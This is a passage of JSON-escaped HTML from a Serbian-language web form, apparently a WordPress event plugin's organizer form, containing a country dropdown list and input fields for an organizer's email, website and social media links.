value=\"cr\" >\u041a\u043e\u0441\u0442\u0430 \u0420\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ci\" >\u041e\u0431\u0430\u043b\u0430 \u0421\u043b\u043e\u043d\u043e\u0432\u0430\u0447\u0435<\/option>\r\n\t\t\t<option value=\"hr\" >\u0425\u0440\u0432\u0430\u0442\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"cu\" >\u041a\u0443\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cy\" >\u041a\u0438\u043f\u0430\u0440<\/option>\r\n\t\t\t<option value=\"cz\" >\u0427\u0435\u0448\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"dk\" >\u0414\u0430\u043d\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"dj\" >\u040f\u0438\u0431\u0443\u0442\u0438<\/option>\r\n\t\t\t<option value=\"dm\" >\u0414\u043e\u043c\u0438\u043d\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"do\" >\u0414\u043e\u043c\u0438\u043d\u0438\u043a\u0430\u043d\u0441\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ec\" >\u0415\u043a\u0432\u0430\u0434\u043e\u0440<\/option>\r\n\t\t\t<option value=\"eg\" >\u0415\u0433\u0438\u043f\u0430\u0442<\/option>\r\n\t\t\t<option value=\"sv\" >\u0415\u043b \u0421\u0430\u043b\u0432\u0430\u0434\u043e\u0440<\/option>\r\n\t\t\t<option value=\"gq\" >\u0415\u043a\u0432\u0430\u0442\u043e\u0440\u0438\u0458\u0430\u043b\u043d\u0430 \u0413\u0432\u0438\u043d\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"er\" >\u0415\u0440\u0438\u0442\u0440\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ee\" >\u0415\u0441\u0442\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"et\" >\u0415\u0442\u0438\u043e\u043f\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"fk\" >\u0424\u043e\u043b\u043a\u043b\u0430\u043d\u0434\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"fo\" >\u0424\u0430\u0440\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"fj\" >\u0424\u0438\u045f\u0438<\/option>\r\n\t\t\t<option value=\"fi\" >\u0424\u0438\u043d\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"fr\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gf\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0430 \u0413\u0438\u0458\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"pf\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0430 \u041f\u043e\u043b\u0438\u043d\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"tf\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0435 \u0408\u0443\u0441\u0436\u043d\u0435 \u0422\u0435\u0440\u0438\u0442\u043e\u0440\u0438\u0458\u0435<\/option>\r\n\t\t\t<option value=\"ga\" >\u0413\u0430\u0431\u043e\u043d<\/option>\r\n\t\t\t<option value=\"gm\" >\u0413\u0430\u043c\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ge\" >\u0413\u0440\u0443\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"de\" >\u041d\u0435\u043c\u0430\u0447\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gh\" >\u0413\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"gi\" >\u0413\u0438\u0431\u0440\u0430\u043b\u0442\u0430\u0440<\/option>\r\n\t\t\t<option value=\"gr\" >\u0413\u0440\u0447\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gl\" >\u0413\u0440\u0435\u043d\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"gd\" >\u0413\u0440\u0435\u043d\u0430\u0434\u0430<\/option>\r\n\t\t\t<option value=\"gp\" >\u0413\u0432\u0430\u0434\u0430\u043b\u0443\u043f\u0435<\/option>\r\n\t\t\t<option value=\"gu\" >\u0413\u0443\u0430\u043c<\/option>\r\n\t\t\t<option value=\"gt\" >\u0413\u0432\u0430\u0442\u0435\u043c\u0430\u043b\u0430<\/option>\r\n\t\t\t<option value=\"gg\" >\u0413\u0435\u0440\u043d\u0437\u0438<\/option>\r\n\t\t\t<option value=\"gn\" >\u0413\u0432\u0438\u043d\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"gw\" >\u0413\u0432\u0438\u043d\u0435\u0458\u0430-\u0411\u0438\u0441\u0430\u0443<\/option>\r\n\t\t\t<option value=\"gy\" >\u0413\u0438\u0458\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"ht\" >\u0425\u0430\u0438\u0442\u0438<\/option>\r\n\t\t\t<option value=\"hm\" >\u041e\u0441\u0442\u0440\u0432\u043e \u0425\u0435\u0440\u0434 \u0438 \u043e\u0441\u0442\u0440\u0432\u0430 \u041c\u0430\u043a\u0434\u043e\u043d\u0430\u043b\u0434<\/option>\r\n\t\t\t<option value=\"va\" >\u0412\u0430\u0442\u0438\u043a\u0430\u043d<\/option>\r\n\t\t\t<option value=\"hn\" >\u0425\u043e\u043d\u0434\u0443\u0440\u0430\u0441<\/option>\r\n\t\t\t<option value=\"hk\" >\u0425\u043e\u043d\u0433 \u041a\u043e\u043d\u0433<\/option>\r\n\t\t\t<option value=\"hu\" >\u041c\u0430\u0452\u0430\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"is\" >\u0418\u0441\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"in\" >\u0418\u043d\u0434\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"id\" >\u0418\u043d\u0434\u043e\u043d\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ir\" >\u0418\u0440\u0430\u043d<\/option>\r\n\t\t\t<option value=\"iq\" >\u0418\u0440\u0430\u043a<\/option>\r\n\t\t\t<option value=\"ie\" >\u0418\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"im\" >\u041e\u0441\u0442\u0440\u0432\u043e \u041c\u0430\u043d<\/option>\r\n\t\t\t<option value=\"il\" >\u0418\u0437\u0440\u0430\u0435\u043b<\/option>\r\n\t\t\t<option value=\"it\" >\u0418\u0442\u0430\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"jm\" >\u0408\u0430\u043c\u0430\u0458\u043a\u0430<\/option>\r\n\t\t\t<option value=\"jp\" >\u0408\u0430\u043f\u0430\u043d<\/option>\r\n\t\t\t<option value=\"je\" >\u040f\u0435\u0440\u0441\u0438<\/option>\r\n\t\t\t<option value=\"jo\" >\u0408\u043e\u0440\u0434\u0430\u043d<\/option>\r\n\t\t\t<option value=\"kz\" >\u041a\u0430\u0437\u0430\u0445\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"ke\" >\u041a\u0435\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ki\" >\u041a\u0438\u0440\u0438\u0431\u0430\u0442\u0438<\/option>\r\n\t\t\t<option value=\"kr\" >\u041a\u043e\u0440\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"kw\" >\u041a\u0443\u0432\u0430\u0458\u0442<\/option>\r\n\t\t\t<option value=\"kg\" >\u041a\u0438\u0440\u0433\u0438\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"la\" >\u041b\u0430\u043e\u0441<\/option>\r\n\t\t\t<option value=\"lv\" >\u041b\u0435\u0442\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"lb\" >\u041b\u0438\u0431\u0430\u043d<\/option>\r\n\t\t\t<option value=\"ls\" >\u041b\u0435\u0441\u043e\u0442\u043e<\/option>\r\n\t\t\t<option value=\"lr\" >\u041b\u0438\u0431\u0435\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ly\" >\u041b\u0438\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"li\" >\u041b\u0438\u0445\u0442\u0435\u043d\u0448\u0442\u0430\u0458\u043d<\/option>\r\n\t\t\t<option value=\"lt\" >\u041b\u0438\u0442\u0432\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"lu\" >\u041b\u0443\u043a\u0441\u0435\u043c\u0431\u0443\u0440\u0433<\/option>\r\n\t\t\t<option value=\"mo\" >\u041c\u0430\u043a\u0430\u043e<\/option>\r\n\t\t\t<option value=\"mk\" >\u0421\u0435\u0432\u0435\u0440\u043d\u0430 \u041c\u0430\u043a\u0435\u0434\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mg\" >\u041c\u0430\u0434\u0430\u0433\u0430\u0441\u043a\u0430\u0440<\/option>\r\n\t\t\t<option value=\"mw\" >\u041c\u0430\u043b\u0430\u0432\u0438<\/option>\r\n\t\t\t<option value=\"my\" >\u041c\u0430\u043b\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mv\" >\u041c\u0430\u043b\u0434\u0438\u0432\u0438<\/option>\r\n\t\t\t<option value=\"ml\" >\u041c\u0430\u043b\u0438<\/option>\r\n\t\t\t<option value=\"mt\" >\u041c\u0430\u043b\u0442\u0430<\/option>\r\n\t\t\t<option value=\"mh\" >\u041c\u0430\u0440\u0448\u0430\u043b\u043e\u0432\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"mq\" >\u041c\u0430\u0440\u0442\u0438\u043d\u0438\u043a<\/option>\r\n\t\t\t<option value=\"mr\" >\u041c\u0430\u0443\u0440\u0438\u0442\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mu\" >\u041c\u0430\u0443\u0440\u0438\u0446\u0438\u0458\u0443\u0441<\/option>\r\n\t\t\t<option value=\"yt\" >\u041c\u0430\u0458\u043e\u0442<\/option>\r\n\t\t\t<option value=\"mx\" >\u041c\u0435\u043a\u0441\u0438\u043a\u043e<\/option>\r\n\t\t\t<option value=\"fm\" >\u041c\u0438\u043a\u0440\u043e\u043d\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"md\" >\u041c\u043e\u043b\u0434\u0430\u0432\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mc\" >\u041c\u043e\u043d\u0430\u043a\u043e<\/option>\r\n\t\t\t<option value=\"mn\" >\u041c\u043e\u043d\u0433\u043e\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"me\" >\u0426\u0440\u043d\u0430 \u0413\u043e\u0440\u0430<\/option>\r\n\t\t\t<option value=\"ms\" >\u041c\u043e\u043d\u0441\u0435\u0440\u0430\u0442<\/option>\r\n\t\t\t<option value=\"ma\" >\u041c\u0430\u0440\u043e\u043a\u043e<\/option>\r\n\t\t\t<option value=\"mz\" >\u041c\u043e\u0437\u0430\u043c\u0431\u0438\u043a<\/option>\r\n\t\t\t<option value=\"mm\" >\u041c\u0438\u0458\u0430\u043d\u043c\u0430\u0440<\/option>\r\n\t\t\t<option value=\"na\" >\u041d\u0430\u043c\u0438\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"nr\" >\u041d\u0430\u0443\u0440\u0443<\/option>\r\n\t\t\t<option value=\"np\" >\u041d\u0435\u043f\u0430\u043b<\/option>\r\n\t\t\t<option value=\"nl\" >\u0425\u043e\u043b\u0430\u043d\u0434\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"an\" >\u0425\u043e\u043d\u0430\u043b\u0434\u0441\u043a\u0438 \u0410\u043d\u0442\u0438\u043b\u0438<\/option>\r\n\t\t\t<option value=\"nc\" >\u041d\u043e\u0432\u0430 \u041a\u0430\u043b\u0435\u0434\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"nz\" >\u041d\u043e\u0432\u0438 \u0417\u0435\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"ni\" >\u041d\u0438\u043a\u0430\u0440\u0430\u0433\u0432\u0430<\/option>\r\n\t\t\t<option value=\"ne\" >\u041d\u0438\u0433\u0435\u0440<\/option>\r\n\t\t\t<option value=\"ng\" >\u041d\u0438\u0433\u0435\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"nu\" >\u041d\u0438\u0458\u0443\u0435<\/option>\r\n\t\t\t<option value=\"nf\" >\u041d\u043e\u0440\u0444\u043e\u043b\u043a<\/option>\r\n\t\t\t<option value=\"mp\" >\u041e\u0441\u0442\u0440\u0432\u0430 \u0421\u0435\u0432\u0435\u0440\u043d\u0430 \u041c\u0430\u0440\u0438\u0458\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"no\" >\u041d\u043e\u0440\u0432\u0435\u0448\u043a\u0430<\/option>\r\n\t\t\t<option value=\"om\" >\u041e\u043c\u0430\u043d<\/option>\r\n\t\t\t<option value=\"pk\" >\u041f\u0430\u043a\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"pw\" >\u041f\u0430\u043b\u0430\u0443<\/option>\r\n\t\t\t<option value=\"ps\" >\u041f\u0430\u043b\u0435\u0441\u0442\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"pa\" >\u041f\u0430\u043d\u0430\u043c\u0430<\/option>\r\n\t\t\t<option value=\"pg\" >\u041f\u0430\u043f\u0443\u0430 \u041d\u043e\u0432\u0430 \u0413\u0432\u0438\u043d\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"py\" >\u041f\u0430\u0440\u0430\u0433\u0432\u0430\u0458<\/option>\r\n\t\t\t<option value=\"pe\" >\u041f\u0435\u0440\u0443<\/option>\r\n\t\t\t<option value=\"ph\" >\u0424\u0438\u043b\u0438\u043f\u0438\u043d\u0438<\/option>\r\n\t\t\t<option value=\"pn\" >\u041f\u0438\u0442\u043a\u0435\u0440\u043d<\/option>\r\n\t\t\t<option value=\"pl\" >\u041f\u043e\u0459\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"pt\" >\u041f\u043e\u0440\u0442\u0443\u0433\u0430\u043b<\/option>\r\n\t\t\t<option value=\"pr\" >\u041f\u043e\u0440\u0442\u043e \u0420\u0438\u043a\u043e<\/option>\r\n\t\t\t<option value=\"qa\" >\u041a\u0430\u0442\u0430\u0440<\/option>\r\n\t\t\t<option value=\"re\" >\u0420\u0435\u0443\u043d\u0438\u043e\u043d<\/option>\r\n\t\t\t<option value=\"ro\" >\u0420\u0443\u043c\u0443\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ru\" >\u0420\u0443\u0441\u043a\u0430 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"rw\" >\u0420\u0443\u0430\u043d\u0434\u0430<\/option>\r\n\t\t\t<option value=\"bl\" >\u0421\u0435\u043d \u0411\u0430\u0440\u0442\u0435\u043b\u0435\u043c\u0438<\/option>\r\n\t\t\t<option value=\"sh\" >\u0421\u0432\u0435\u0442\u0430 \u0425\u0435\u043b\u0435\u043d\u0430<\/option>\r\n\t\t\t<option value=\"kn\" >\u0412\u0435\u0442\u0438 \u041a\u0438\u0442\u0438\u0441 \u0438 \u041d\u0435\u0432\u0438\u0441<\/option>\r\n\t\t\t<option value=\"lc\" >\u0421\u0430\u043d\u0442\u0430 \u041b\u0443\u0446\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mf\" >\u0421\u0435\u043d\u0442 \u041c\u0430\u0440\u0442\u0435\u043d<\/option>\r\n\t\t\t<option value=\"pm\" >\u0421\u0435\u043d \u041f\u0458\u0435\u0440 \u0438 \u041c\u0438\u043a\u0435\u043b\u043e\u043d<\/option>\r\n\t\t\t<option value=\"vc\" >\u0421\u0435\u043d\u0442 \u0412\u0438\u043d\u0441\u0435\u043d\u0442 \u0438 \u0413\u0440\u0435\u043d\u0430\u0434\u0438\u043d\u0438<\/option>\r\n\t\t\t<option value=\"ws\" >\u0421\u0430\u043c\u043e\u0430<\/option>\r\n\t\t\t<option value=\"sm\" >\u0421\u0430\u043d \u041c\u0430\u0440\u0438\u043e\u043d\u043e<\/option>\r\n\t\t\t<option value=\"st\" >\u0421\u0430\u043e \u0422\u043e\u043c\u0435 \u0438 \u041f\u0440\u0438\u043d\u0446\u0438\u043f\u0435<\/option>\r\n\t\t\t<option value=\"sa\" >\u0421\u0430\u0443\u0434\u0438\u0458\u0441\u043a\u0430 \u0410\u0440\u0430\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"sn\" >\u0421\u0435\u043d\u0435\u0433\u0430\u043b<\/option>\r\n\t\t\t<option value=\"rs\" >Serbia<\/option>\r\n\t\t\t<option value=\"sc\" >\u0421\u0435\u0458\u0448\u0435\u043b\u0438<\/option>\r\n\t\t\t<option value=\"sl\" >\u0421\u0438\u0435\u0440\u0430 \u041b\u0435\u043e\u043d\u0435<\/option>\r\n\t\t\t<option value=\"sg\" >\u0421\u0438\u043d\u0433\u0430\u043f\u0443\u0440<\/option>\r\n\t\t\t<option value=\"sk\" >\u0421\u043b\u043e\u0432\u0430\u0447\u043a\u0430<\/option>\r\n\t\t\t<option value=\"si\" >\u0421\u043b\u043e\u0432\u0435\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"sb\" >\u0421\u043e\u043b\u043e\u043c\u043e\u043d\u043e\u0432\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"so\" >\u0421\u043e\u043c\u0430\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"za\" >\u0408\u0443\u0436\u043d\u0430 \u0410\u0444\u0440\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gs\" >\u0408\u0443\u0436\u043d\u0430 \u040f\u043e\u0440\u045f\u0438\u0458\u0430 \u0438 \u0421\u0435\u043d\u0434\u0432\u0438\u0447 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"es\" >\u0428\u043f\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"lk\" >\u0428\u0440\u043b\u0438 \u041b\u0430\u043d\u043a\u0430<\/option>\r\n\t\t\t<option value=\"sd\" >\u0421\u0443\u0434\u0430\u043d<\/option>\r\n\t\t\t<option value=\"sr\" >\u0421\u0443\u0440\u0438\u043d\u0430\u043c<\/option>\r\n\t\t\t<option value=\"sj\" >\u0421\u0432\u0430\u043b\u0431\u0430\u0440\u0434 \u0438 \u0408\u0430\u043d \u041c\u0430\u0458\u0435\u043d<\/option>\r\n\t\t\t<option value=\"sz\" >\u0421\u0432\u0430\u0437\u0438\u043b\u0435\u043d\u0434<\/option>\r\n\t\t\t<option value=\"se\" >\u0428\u0432\u0435\u0434\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ch\" >\u0428\u0432\u0430\u0458\u0446\u0430\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"sy\" >\u0421\u0438\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"tw\" >\u0422\u0430\u0458\u0432\u0430\u043d<\/option>\r\n\t\t\t<option value=\"tj\" >\u0422\u0430\u045f\u0438\u043a\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"tz\" >\u0422\u0430\u043d\u0437\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"th\" >\u0422\u0430\u0458\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"tl\" >\u0422\u0438\u043c\u043e\u0440-\u041b\u0435\u0441\u043e\u0442\u043e<\/option>\r\n\t\t\t<option value=\"tg\" >\u0422\u043e\u0433\u043e<\/option>\r\n\t\t\t<option value=\"tk\" >\u0422\u043e\u043a\u0435\u043b\u0430\u0443<\/option>\r\n\t\t\t<option value=\"to\" >\u0422\u043e\u043d\u0433\u043e<\/option>\r\n\t\t\t<option value=\"tt\" >\u0422\u0440\u0438\u043d\u0438\u0434\u0430\u0434 \u0438 \u0422\u043e\u0431\u0430\u0433\u043e<\/option>\r\n\t\t\t<option value=\"tn\" >\u0422\u0443\u043d\u0438\u0446<\/option>\r\n\t\t\t<option value=\"tr\" >\u0422\u0443\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"tm\" >\u0422\u0443\u0440\u043a\u043c\u0435\u043d\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"tc\" >\u0422\u0435\u0440\u043a\u0441 \u0438 \u041a\u0435\u0458\u043a\u043e\u0441<\/option>\r\n\t\t\t<option value=\"tv\" >\u0422\u0443\u0432\u0430\u043b\u0443<\/option>\r\n\t\t\t<option value=\"ug\" >\u0423\u0433\u0430\u043d\u0434\u0430<\/option>\r\n\t\t\t<option value=\"ua\" >\u0423\u043a\u0440\u0430\u0458\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"ae\" >\u0423\u0458\u0435\u0434\u0438\u045a\u0435\u043d\u0438 \u0410\u0440\u0430\u043f\u0441\u043a\u0438 \u0415\u043c\u0438\u0440\u0430\u0442\u0438<\/option>\r\n\t\t\t<option value=\"gb\" >\u0412\u0435\u043b\u0438\u043a\u0430 \u0411\u0440\u0438\u0442\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"us\" >\u0421\u0458\u0435\u0434\u0438\u045a\u0435\u043d\u0435 \u0410\u043c\u0435\u0440\u0438\u0447\u043a\u0435 \u0414\u0440\u0436\u0430\u0432\u0435<\/option>\r\n\t\t\t<option value=\"um\" >\u041c\u0430\u043b\u0430 \u0441\u043f\u043e\u0459\u043d\u0430 \u043e\u0441\u0442\u0440\u0432\u0430 \u0421\u0458\u0435\u0434\u0438\u045a\u0435\u043d\u0438\u0445 \u0410\u043c\u0435\u0440\u0438\u0447\u043a\u0438\u0445 \u0414\u0440\u0436\u0430\u0432\u0430<\/option>\r\n\t\t\t<option value=\"uy\" >\u0423\u0440\u0443\u0433\u0432\u0430\u0458<\/option>\r\n\t\t\t<option value=\"uz\" >\u0423\u0437\u0431\u0435\u043a\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"vu\" >\u0412\u0430\u043d\u0443\u0430\u0442\u0443<\/option>\r\n\t\t\t<option value=\"ve\" >\u0412\u0435\u043d\u0435\u0446\u0443\u0435\u043b\u0430<\/option>\r\n\t\t\t<option value=\"vn\" >\u0412\u0438\u0458\u0435\u0442\u043d\u0430\u043c<\/option>\r\n\t\t\t<option value=\"vg\" >\u0414\u0435\u0432\u0438\u0447\u0430\u043d\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430, \u0411\u0440\u0438\u0442\u0430\u043d\u0441\u043a\u0430 \u0442\u0435\u0440\u0438\u0442\u043e\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"vi\" >\u0414\u0435\u0432\u0438\u0447\u0430\u043d\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430, \u0421\u0410\u0414<\/option>\r\n\t\t\t<option value=\"wf\" >\u0412\u0430\u043b\u0438\u0441 \u0438 \u0424\u0443\u0442\u0443\u043d\u0430<\/option>\r\n\t\t\t<option value=\"eh\" >\u0417\u0430\u043f\u0430\u0434\u043d\u0430 \u0421\u0430\u0445\u0430\u0440\u0430<\/option>\r\n\t\t\t<option value=\"ye\" >\u0408\u0435\u043c\u0435\u043d<\/option>\r\n\t\t\t<option value=\"zm\" >\u0417\u0430\u043c\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"zw\" >\u0417\u0438\u043c\u0431\u0430\u0431\u0432\u0435<\/option>\r\n\t\r\n<\/select>\r\n\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_email\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_email\">\r\n\t\t\t\t\t\t\t\u0415-\u043f\u043e\u0448\u0442\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\u0430<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_email\" name=\"organizer_email\" id=\"organizer_email\" placeholder=\"\u0423\u043d\u0435\u0441\u0438\u0442\u0435 \u0432\u0430\u0448\u0443 \u043c\u0435\u0458\u043b \u0430\u0434\u0440\u0435\u0441\u0443\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_website\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_website\">\r\n\t\t\t\t\t\t\t\u0412\u0435\u0431\u0441\u0430\u0458\u0442 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_website\" name=\"organizer_website\" id=\"organizer_website\" placeholder=\"\u0412\u0435\u0431\u0441\u0430\u0458\u0442 URL \u043d\u043f\u0440. http:\/\/www.yourorganization.com\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_facebook\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_facebook\">\r\n\t\t\t\t\t\t\t\u0424\u0435\u0458\u0441\u0431\u0443\u043a <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_facebook\" name=\"organizer_facebook\" id=\"organizer_facebook\" placeholder=\"\u0424\u0435\u0458\u0441\u0431\u0443\u043a URL \u043d\u043f\u0440. http:\/\/www.facebook.com\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_instagram\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_instagram\">\r\n\t\t\t\t\t\t\t\u0418\u043d\u0441\u0442\u0430\u0433\u0440\u0430\u043c <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_instagram\" name=\"organizer_instagram\" id=\"organizer_instagram\" placeholder=\"\u0418\u043d\u0441\u0442\u0430\u0433\u0440\u0430\u043c URL \u043d\u043f\u0440. http:\/\/www.instagram.com\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_youtube\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_youtube\">\r\n\t\t\t\t\t\t\t\u0408\u0443\u0442\u0458\u0443\u0431 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_youtube\" name=\"organizer_youtube\" id=\"organizer_youtube\" placeholder=\"\u0408\u0443\u0442\u0458\u0443\u0431 URL \u043d\u0440\u043f. http:\/\/www.youtube.com\/channel\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_twitter\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_twitter\">\r\n\t\t\t\t\t\t\t\u0422\u0432\u0438\u0442\u0435\u0440 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_twitter\" name=\"organizer_twitter\" id=\"organizer_twitter\" placeholder=\"\u0422\u0432\u0438\u0442\u0435\u0440 URL \u043d\u043f\u0440. http:\/\/twitter.com\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t<div class=\"wpem-form-footer\">\r\n\t\t\t\t\t\t<input type=\"hidden\" name=\"organizer_id\" value=\"0\">\r\n\t\t\t\t\t\t<input type=\"hidden\" name=\"step\" value=\"0\">\r\n\t\t\t\t\t\t<input type=\"button\" name=\"submit_organizer\" 